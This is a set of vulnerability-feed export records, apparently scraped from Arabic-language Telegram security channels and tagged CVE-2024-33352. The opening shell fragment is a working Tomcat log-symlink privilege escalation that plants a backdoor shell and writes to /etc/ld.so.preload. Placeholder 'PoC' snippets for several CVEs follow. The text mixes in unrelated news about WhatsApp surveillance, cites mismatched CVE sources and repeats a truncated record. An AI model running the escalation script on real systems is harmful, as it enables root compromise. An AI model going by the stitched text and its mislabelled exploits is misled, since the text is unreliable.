\u0627\u0644\u062e\u0644\u0641\u064a\u0629/\u0627\u0644\u0642\u0634\u0631\u0629 \u0630\u0627\u062a \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u0645\u0646\u062e\u0641\u0636\u0629\ncp $BACKDOORSH $BACKDOORPATH\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\nls -l $BACKDOORPATH\"\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0631\u0627\u0628\u0637 \u0627\u0644\u0631\u0645\u0632\u064a \u0644\u0645\u0644\u0641 ld.so.preload\nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\n cleanexit 3\nfi\necho -e \"\\n[+] Symlink created at: \\nls -l $TOMCATLOG\"\n\n# \u0627\u0644\u0627\u0646\u062a\u0638\u0627\u0631 \u062d\u062a\u0649 \u064a\u062a\u0645 \u0625\u0639\u0627\u062f\u0629 \u0641\u062a\u062d \u0627\u0644\u0633\u062c\u0644\u0627\u062a \u0628\u0648\u0627\u0633\u0637\u0629 Tomcat\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\nwhile :; do\n sleep 0.1\n if [ -f /etc/ld.so.preload ]; then\n echo $PRIVESCLIB > /etc/ld.so.preload\n break;\n### \u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629\n\n\u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0646\u0638\u0627\u0645 \u0645\u0646 \u0647\u0630\u0627 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\u060c \u064a\u064f\u0646\u0635\u062d \u0628\u062a\u062d\u062f\u064a\u062b BlueStacks \u0625\u0644\u0649 \u0622\u062e\u0631 \u0625\u0635\u062f\u0627\u0631 \u0648\u0627\u0644\u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u0637\u0628\u064a\u0642 \u062c\u0645\u064a\u0639 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0645\u062a\u0627\u062d\u0629. \u0643\u0645\u0627 \u064a\u062c\u0628 \u062f\u0627\u0626\u0645\u064b\u0627 \u0627\u0644\u062d\u0631\u0635 \u0639\u0644\u0649 \u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0644\u0646\u0634\u0627\u0637\u0627\u062a \u063a\u064a\u0631 \u0627\u0644\u0627\u0639\u062a\u064a\u0627\u062f\u064a\u0629.\n\n### \u0627\u0644\u0645\u0635\u0627\u062f\u0631\n\n- [mmiszczyk/CVE-2024-33352 \u0639\u0644\u0649 GitHub](https://github.com/mmiszczyk/CVE-2024-33352)\n- [\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 \u0639\u0644\u0649 GitHub](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh)\n\nALSED404:\n\u0627\u062d\u0630\u0631 \u0645\u0646 \u062d\u0632\u0645\u0629 PyPI \"lr-utils-lib\"\u060c \u0641\u0647\u064a \u062a\u0645\u062b\u0644 \u062a\u0647\u062f\u064a\u062f\u064b\u0627 \u062c\u062f\u064a\u062f\u064b\u0627 \u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a macOS!\n\n\u062a\u0633\u0631\u0642 \u0647\u0630\u0647 \u0627\u0644\u062d\u0632\u0645\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0639\u062a\u0645\u0627\u062f Google Cloud\u060c \u0645\u0645\u0627 \u064a\u0634\u0643\u0644 \u062e\u0637\u0631\u064b\u0627 \u0643\u0628\u064a\u0631\u064b\u0627 \u0639\u0644\u0649 \u0643\u0644 \u0645\u0646 \u0627\u0644\u0645\u0637\u0648\u0631\u064a\u0646 \u0627\u0644\u0623\u0641\u0631\u0627\u062f \u0648\u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a.\n\n\u0627\u0642\u0631\u0623 \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2024/07/malicious-pypi-package-targets-macos-to.html\n\nSQL\ud83d\udc7d:\n\u0625\u0644\u064a\u0643 \u0628\u0639\u0636 \u0627\u0644\u0643\u0648\u0631\u0633\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0648\u0625\u0635\u0644\u0627\u062d\u0647\u0627\u060c \u0645\u0639 \u0628\u0639\u0636 \u0627\u0644\u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u0645\u0647\u0645\u0629 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062c\u0627\u0644:\n\n### \u062f\u0648\u0631\u0627\u062a \u0628\u0627\u0644\u0644\u063a\u0629 \u0627\u0644\u0639\u0631\u0628\u064a\u0629:\n\n1. \u062f\u0648\u0631\u0629 \u0627\u0644\u0642\u0631\u0635\u0646\u0629 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a\u0629 \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629:\n - \u0645\u0646\u0635\u0629: \u0623\u0643\u0627\u062f\u064a\u0645\u064a\u0629 \u0627\u0644\u0632\u064a\u0631\u0648\n - \u062a\u063a\u0637\u064a \u0627\u0644\u062f\u0648\u0631\u0629 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0623\u0645\u0627\u0646 \u0641\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.elzero.org/courses/ethical-hacking/)", "creation_timestamp": "2024-12-13T19:00:22.000000Z"} https://vulnerability.circl.lu/sighting/38ae3309-c519-4649-abb4-0515d15de5ad/export Fri, 13 Dec 2024 19:00:22 +0000 https://vulnerability.circl.lu/sighting/20dfd601-d1e6-4bf1-929e-4d6c623f6efe/export {"uuid": "20dfd601-d1e6-4bf1-929e-4d6c623f6efe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1610", "content": "(Photo by Tayfun Coskun/Anadolu via Getty Images)\n\u062d\u0634\u0648\u062f \u062e\u0627\u0631\u062c \u0645\u0642\u0631 \u0645\u064a\u062a\u0627 (\u0641\u064a\u0633\u0628\u0648\u0643) \u0644\u0644\u0627\u062d\u062a\u062c\u0627\u062c \u0639\u0644\u0649 \u0631\u0642\u0627\u0628\u0629 \u0645\u0627\u0631\u0643 \u0632\u0648\u0643\u0631\u0628\u064a\u0631\u063a \u0648\u0645\u064a\u062a\u0627 \u0639\u0644\u0649 \u0645\u0646\u0634\u0648\u0631\u0627\u062a \u0641\u0644\u0633\u0637\u064a\u0646 \u0639\u0644\u0649 \u0627\u0644\u0645\u0646\u0635\u0627\u062a \u0627\u0644\u0627\u062c\u062a\u0645\u0627\u0639\u064a\u0629 \u0641\u064a \u0645\u064a\u0646\u0644\u0648 \u0628\u0627\u0631\u0643\u060c \u0643\u0627\u0644\u064a\u0641\u0648\u0631\u0646\u064a\u0627 (\u0627\u0644\u0623\u0646\u0627\u0636\u0648\u0644)\n23/5/2024-\u0622\u062e\u0631 \u062a\u062d\u062f\u064a\u062b: 23/5/202403:28 \u0645 (\u0628\u062a\u0648\u0642\u064a\u062a \u0645\u0643\u0629 \u0627\u0644\u0645\u0643\u0631\u0645\u0629)\n\u0646\u0628\u0647 \u0645\u0648\u0642\u0639 \u0625\u0646\u062a\u0631\u0633\u0628\u062a \u0627\u0644\u0623\u0645\u064a\u0631\u0643\u064a \u0625\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0645\u062c\u0647\u0648\u0644\u0629 \u0628\u062a\u0637\u0628\u064a\u0642 \u0648\u0627\u062a\u0633\u0627\u0628 \u062a\u0645\u0643\u0646 \u0627\u0644\u062d\u0643\u0648\u0645\u0627\u062a \u0645\u0646 \u0645\u0639\u0631\u0641\u0629 \u0645\u0646 \u062a\u0631\u0627\u0633\u0644\u0647\u060c \u0648\u062d\u0630\u0631 \u0627\u0644\u0645\u0647\u0646\u062f\u0633\u0648\u0646 \u0641\u064a \u0634\u0631\u0643\u0629 \u0645\u064a\u062a\u0627 (\u0641\u064a\u0633\u0628\u0648\u0643) \u0645\u0646 \u0623\u0646 \u0627\u0644\u062f\u0648\u0644 \u064a\u0645\u0643\u0646\u0647\u0627 \u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u062f\u0631\u062f\u0634\u0627\u062a\u060c \u0648\u064a\u062e\u0634\u0649 \u0627\u0644\u0645\u0648\u0638\u0641\u0648\u0646 \u0623\u0646 \u062a\u0633\u062a\u063a\u0644 \u0625\u0633\u0631\u0627\u0626\u064a\u0644 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u0627\u0646\u062a\u0642\u0627\u0621 \u0623\u0647\u062f\u0627\u0641 \u0627\u0644\u0627\u063a\u062a\u064a\u0627\u0644 \u0641\u064a \u063a\u0632\u0629.\n\n\u0648\u0630\u0643\u0631 \u0627\u0644\u0645\u0648\u0642\u0639 \u0623\u0646\u0647 \u0641\u064a \u0634\u0647\u0631 \u0645\u0627\u0631\u0633/\u0622\u0630\u0627\u0631\u060c \u0623\u0635\u062f\u0631 \u0641\u0631\u064a\u0642 \u0623\u0645\u0646 \u0648\u0627\u062a\u0633\u0627\u0628 \u062a\u062d\u0630\u064a\u0631\u0627 \u062f\u0627\u062e\u0644\u064a\u0627 \u0644\u0632\u0645\u0644\u0627\u0626\u0647 \u0628\u0623\u0646\u0647 \u0631\u063a\u0645 \u0627\u0644\u062a\u0634\u0641\u064a\u0631 \u0627\u0644\u0642\u0648\u064a \u0644\u0644\u0628\u0631\u0646\u0627\u0645\u062c\u060c \u0641\u0642\u062f \u0638\u0644 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0648\u0646 \u0639\u0631\u0636\u0629 \u0644\u0634\u0643\u0644 \u062e\u0637\u064a\u0631 \u0645\u0646 \u0623\u0634\u0643\u0627\u0644 \u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u062d\u0643\u0648\u0645\u064a\u0629.\n\n\u0648\u0648\u0641\u0642\u0627 \u0644\u062a\u0642\u064a\u064a\u0645 \u0627\u0644\u062a\u0647\u062f\u064a\u062f \u0627\u0644\u0630\u064a \u0644\u0645 \u064a\u064f\u0628\u0644\u063a \u0639\u0646\u0647 \u0645\u0633\u0628\u0642\u0627\u060c \u0648\u062d\u0635\u0644 \u0639\u0644\u064a\u0647 \u0627\u0644\u0645\u0648\u0642\u0639\u060c \u0641\u0625\u0646 \u0645\u062d\u062a\u0648\u064a\u0627\u062a \u0627\u0644\u0645\u062d\u0627\u062f\u062b\u0627\u062a \u0628\u064a\u0646 \u0645\u0633\u062a\u062e\u062f\u0645\u064a \u0627\u0644\u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u0628\u0627\u0644\u063a \u0639\u062f\u062f\u0647\u0645 2 \u0645\u0644\u064a\u0627\u0631 \u0645\u0633\u062a\u062e\u062f\u0645 \u062a\u0638\u0644 \u0622\u0645\u0646\u0629\u060c \u0644\u0643\u0646 \u0627\u0644\u062f\u0648\u0627\u0626\u0631 \u0627\u0644\u062d\u0643\u0648\u0645\u064a\u0629\u060c \u0643\u0645\u0627 \u0643\u062a\u0628 \u0627\u0644\u0645\u0647\u0646\u062f\u0633\u0648\u0646\u060c \u0643\u0627\u0646\u062a \"\u062a\u062a\u062c\u0627\u0648\u0632 \u062a\u0634\u0641\u064a\u0631\u0646\u0627\" \u0644\u0645\u0639\u0631\u0641\u0629 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u0627\u0644\u0630\u064a\u0646 \u064a\u062a\u0648\u0627\u0635\u0644\u0648\u0646 \u0645\u0639 \u0628\u0639\u0636\u0647\u0645 \u0627\u0644\u0628\u0639\u0636\u060c \u0648\u0639\u0636\u0648\u064a\u0629 \u0627\u0644\u0645\u062c\u0645\u0648\u0639\u0627\u062a \u0627\u0644\u062e\u0627\u0635\u0629\u060c \u0648\u0631\u0628\u0645\u0627 \u062d\u062a\u0649 \u0645\u0648\u0627\u0642\u0639\u0647\u0645. \u0648\u062d\u062b \u0627\u0644\u062a\u0642\u064a\u064a\u0645 \u0639\u0644\u0649 \u0623\u0646 \u064a\u062e\u0641\u0641 \u0648\u0627\u062a\u0633\u0627\u0628 \u0645\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0645\u0633\u062a\u0645\u0631 \u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0636\u0639\u0641 \u0641\u064a \u062a\u062d\u0644\u064a\u0644 \u062d\u0631\u0643\u0629 \u0627\u0644\u0645\u0631\u0648\u0631 \u0627\u0644\u062a\u064a \u062a\u0645\u0643\u0646 \u0627\u0644\u062f\u0648\u0644 \u0645\u0646 \u062a\u062d\u062f\u064a\u062f \u0645\u0646 \u064a\u062a\u062d\u062f\u062b \u0625\u0644\u0649 \u0645\u0646.\n\nThe Smart Shadow:\n\u2206 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0627\u062a \u0648\u0625\u062b\u0628\u0627\u062a\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoCs) \u0644\u0644\u062b\u063a\u0631\u0627\u062a \n\n\u2206 1. \u062b\u063a\u0631\u0629 Profile Builder \u0648 Profile Builder Pro\n- \u062e\u0637\u0648\u0631\u0629: 9.8/10\n- \u0627\u0644\u0648\u0635\u0641: \u062a\u0633\u0645\u062d \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0648\u0635\u0648\u0644 \u0627\u0644\u0645\u0633\u0624\u0648\u0644 \u062f\u0648\u0646 \u0627\u0644\u062d\u0627\u062c\u0629 \u0625\u0644\u0649 \u062d\u0633\u0627\u0628 \u0639\u0644\u0649 \u0627\u0644\u0645\u0648\u0642\u0639.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0644\u0627 \u064a\u0648\u062c\u062f \u0625\u062b\u0628\u0627\u062a \u0645\u0641\u0647\u0648\u0645 \u0645\u062d\u062f\u062f \u0641\u064a \u0642\u0648\u0627\u0639\u062f \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629\u060c \u0648\u0644\u0643\u0646 \u062a\u0642\u0627\u0631\u064a\u0631 WPScan \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0633\u064a\u0646\u0627\u0631\u064a\u0648\u0647\u0627\u062a \u062a\u0641\u0635\u064a\u0644\u064a\u0629 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n \n import requests\n\n url = \"http://target-website/wp-login.php\"\n payload = {\n \"username\": \"attacker_username\",\n \"password\": \"attacker_password\"\n }\n response = requests.post(url, data=payload)\n print(response.text)\n \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0646\u0633\u062e\u0629 \u0643\u0645\u0627 \u064a\u0646\u0635\u062d \u0627\u0644\u0645\u0637\u0648\u0631\u0648\u0646.\n\n\u2206 2. \u062b\u063a\u0631\u0629 \u0643\u0627\u0645\u064a\u0631\u0627\u062a Synology BC500 IP\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u062a\u0633\u0645\u062d \u0628\u0627\u0644\u062a\u0628\u062f\u064a\u0644 \u0645\u0646 WAN \u0625\u0644\u0649 LAN\u060c \u062a\u0645 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0641\u064a \u0645\u0633\u0627\u0628\u0642\u0629 Pwn2Own Toronto.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0646\u0634\u0631\u062a Claroty \u062a\u0641\u0627\u0635\u064a\u0644 \u0641\u0646\u064a\u0629 \u062d\u0648\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n \n import requests\n\n url = \"http://target-camera-ip/api/exploit\"\n payload = {\"command\": \"switch_network\"}\n response = requests.post(url, json=payload)\n print(response.text)\n \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u062d\u062f\u064a\u062b \u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u0643\u0627\u0645\u064a\u0631\u0627 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0625\u0635\u062f\u0627\u0631.\n\n#### 3. \u062b\u063a\u0631\u0629 Apache HugeGraph (CVE-2024-27348)\n- \u062e\u0637\u0648\u0631\u0629: 9.8/10\n- \u0627\u0644\u0648\u0635\u0641: \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0627\u0644\u062a\u062d\u0643\u0645 \u0641\u064a \u062e\u0648\u0627\u062f\u0645 \u0642\u0627\u0639\u062f\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0645\u062a\u0627\u062d \u0639\u0644\u0649 GitHub \u0643\u0645\u0627 \u0630\u0643\u0631.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n \n import requests\n\n url = \"http://target-hugegraph-server\"\n payload = {\"exploit\": \"malicious_code_here\"}\n response = requests.post(url, json=payload)\n print(response.text)\n \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u062a\u0635\u062d\u064a\u062d \u0627\u0644\u0623\u0645\u0646\u064a \u0627\u0644\u0635\u0627\u062f\u0631 \u0641\u064a \u0623\u0628\u0631\u064a\u0644.\n\n\u2206 4. \u062b\u063a\u0631\u0627\u062a Microsoft SharePoint (CVE-2024-38023\u060c CVE-2024-38024\u060c CVE-2024-38094)\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u062b\u063a\u0631\u0627\u062a \u0641\u064a \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u064f\u0639\u062f.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0646\u0634\u0631\u0647 Nguyen Giang.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n \n # \u0647\u0630\u0627 \u0645\u062b\u0627\u0644 \u0627\u0641\u062a\u0631\u0627\u0636\u064a\u061b \u0642\u062f \u064a\u062e\u062a\u0644\u0641 \u0631\u0645\u0632 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0641\u0639\u0644\u064a.\n Invoke-WebRequest -Uri \"http://target-sharepoint-server/exploit\" -Method GET\n \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0645\u0642\u062f\u0645\u0629 \u0645\u0646 Microsoft.\n\n\u2206 5. \u062b\u063a\u0631\u0629 SonicWall SMA100\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0641\u064a \u0627\u0644\u0648\u0636\u0639 \u0627\u0644\u0643\u0644\u0627\u0633\u064a\u0643\u064a \u0644\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u0627\u0644\u0645\u0635\u0627\u062f\u0642 \u0639\u0644\u064a\u0647\u0645.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u062a\u0645 \u0646\u0634\u0631\u0647 \u0628\u0648\u0627\u0633\u0637\u0629 SSD.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n \n curl -k -X POST https://target-sma100-device -d \"exploit_payload_here\"\n \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u0625\u0632\u0627\u0644\u0629 \u0627\u0644\u0648\u0636\u0639 \u0627\u0644\u0643\u0644\u0627\u0633\u064a\u0643\u064a \u0648\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u062b\u0627\u0628\u062a\u0629.\n\n\u2206 \u0627\u0644\u062a\u0648\u0635\u064a\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629\n- \u0625\u062f\u0627\u0631\u0629 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a: \u062a\u062d\u062f\u064a\u062b \u062c\u0645\u064a\u0639 \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0648\u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u062b\u0627\u0628\u062a\u0629 \u0628\u0627\u0646\u062a\u0638\u0627\u0645 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a.\n- \u0641\u062d\u0635 \u0627\u0644\u062b\u063a\u0631\u0627\u062a: \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0648\u0627\u062a \u0645\u062b\u0644 Nessus \u0623\u0648 OpenVAS \u0644\u0641\u062d\u0635 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629.\n- \u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629: \u062a\u0637\u0628\u064a\u0642 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u0643\u0634\u0641 \u0639\u0646 \u0627\u0644\u062a\u0633\u0644\u0644 \u0648\u0645\u0646\u0639 \u0627\u0644\u062a\u0633\u0644\u0644 \u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0648\u0645\u0646\u0639 \u0645\u062d\u0627\u0648\u0644\u0627\u062a \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n\n\u2206 \u0627\u0644\u0645\u0635\u0627\u062f\u0631\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-3352)\n- [Security-Database](https://www.security-database.com/detail.php?alert=CVE-2023-3352)\n- [Vulners](https://vulners.com/cve/CVE-2023-3352)\n\n## \u0634\u0631\u062d \u0648\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CVE-2024-33352: \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0641\u064a BlueStacks \u0639\u0628\u0631 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\n\n### \u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629", "creation_timestamp": "2024-12-13T19:00:22.000000Z"} {"uuid": "20dfd601-d1e6-4bf1-929e-4d6c623f6efe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1610", "content": "(Photo by Tayfun Coskun/Anadolu via Getty Images)\n\u062d\u0634\u0648\u062f \u062e\u0627\u0631\u062c \u0645\u0642\u0631 \u0645\u064a\u062a\u0627 (\u0641\u064a\u0633\u0628\u0648\u0643) \u0644\u0644\u0627\u062d\u062a\u062c\u0627\u062c \u0639\u0644\u0649 \u0631\u0642\u0627\u0628\u0629 \u0645\u0627\u0631\u0643 \u0632\u0648\u0643\u0631\u0628\u064a\u0631\u063a \u0648\u0645\u064a\u062a\u0627 \u0639\u0644\u0649 \u0645\u0646\u0634\u0648\u0631\u0627\u062a \u0641\u0644\u0633\u0637\u064a\u0646 \u0639\u0644\u0649 \u0627\u0644\u0645\u0646\u0635\u0627\u062a \u0627\u0644\u0627\u062c\u062a\u0645\u0627\u0639\u064a\u0629 \u0641\u064a \u0645\u064a\u0646\u0644\u0648 \u0628\u0627\u0631\u0643\u060c \u0643\u0627\u0644\u064a\u0641\u0648\u0631\u0646\u064a\u0627 (\u0627\u0644\u0623\u0646\u0627\u0636\u0648\u0644)\n23/5/2024-\u0622\u062e\u0631 \u062a\u062d\u062f\u064a\u062b: 23/5/202403:28 \u0645 (\u0628\u062a\u0648\u0642\u064a\u062a \u0645\u0643\u0629 \u0627\u0644\u0645\u0643\u0631\u0645\u0629)\n\u0646\u0628\u0647 \u0645\u0648\u0642\u0639 \u0625\u0646\u062a\u0631\u0633\u0628\u062a \u0627\u0644\u0623\u0645\u064a\u0631\u0643\u064a \u0625\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0645\u062c\u0647\u0648\u0644\u0629 \u0628\u062a\u0637\u0628\u064a\u0642 \u0648\u0627\u062a\u0633\u0627\u0628 \u062a\u0645\u0643\u0646 \u0627\u0644\u062d\u0643\u0648\u0645\u0627\u062a \u0645\u0646 \u0645\u0639\u0631\u0641\u0629 \u0645\u0646 \u062a\u0631\u0627\u0633\u0644\u0647\u060c \u0648\u062d\u0630\u0631 \u0627\u0644\u0645\u0647\u0646\u062f\u0633\u0648\u0646 \u0641\u064a \u0634\u0631\u0643\u0629 \u0645\u064a\u062a\u0627 (\u0641\u064a\u0633\u0628\u0648\u0643) \u0645\u0646 \u0623\u0646 \u0627\u0644\u062f\u0648\u0644 \u064a\u0645\u0643\u0646\u0647\u0627 \u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u062f\u0631\u062f\u0634\u0627\u062a\u060c \u0648\u064a\u062e\u0634\u0649 \u0627\u0644\u0645\u0648\u0638\u0641\u0648\u0646 \u0623\u0646 \u062a\u0633\u062a\u063a\u0644 \u0625\u0633\u0631\u0627\u0626\u064a\u0644 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u0627\u0646\u062a\u0642\u0627\u0621 \u0623\u0647\u062f\u0627\u0641 \u0627\u0644\u0627\u063a\u062a\u064a\u0627\u0644 \u0641\u064a \u063a\u0632\u0629.\n\n\u0648\u0630\u0643\u0631 \u0627\u0644\u0645\u0648\u0642\u0639 \u0623\u0646\u0647 \u0641\u064a \u0634\u0647\u0631 \u0645\u0627\u0631\u0633/\u0622\u0630\u0627\u0631\u060c \u0623\u0635\u062f\u0631 \u0641\u0631\u064a\u0642 \u0623\u0645\u0646 \u0648\u0627\u062a\u0633\u0627\u0628 \u062a\u062d\u0630\u064a\u0631\u0627 \u062f\u0627\u062e\u0644\u064a\u0627 \u0644\u0632\u0645\u0644\u0627\u0626\u0647 \u0628\u0623\u0646\u0647 \u0631\u063a\u0645 \u0627\u0644\u062a\u0634\u0641\u064a\u0631 \u0627\u0644\u0642\u0648\u064a \u0644\u0644\u0628\u0631\u0646\u0627\u0645\u062c\u060c \u0641\u0642\u062f \u0638\u0644 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0648\u0646 \u0639\u0631\u0636\u0629 \u0644\u0634\u0643\u0644 \u062e\u0637\u064a\u0631 \u0645\u0646 \u0623\u0634\u0643\u0627\u0644 \u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u062d\u0643\u0648\u0645\u064a\u0629.\n\n\u0648\u0648\u0641\u0642\u0627 \u0644\u062a\u0642\u064a\u064a\u0645 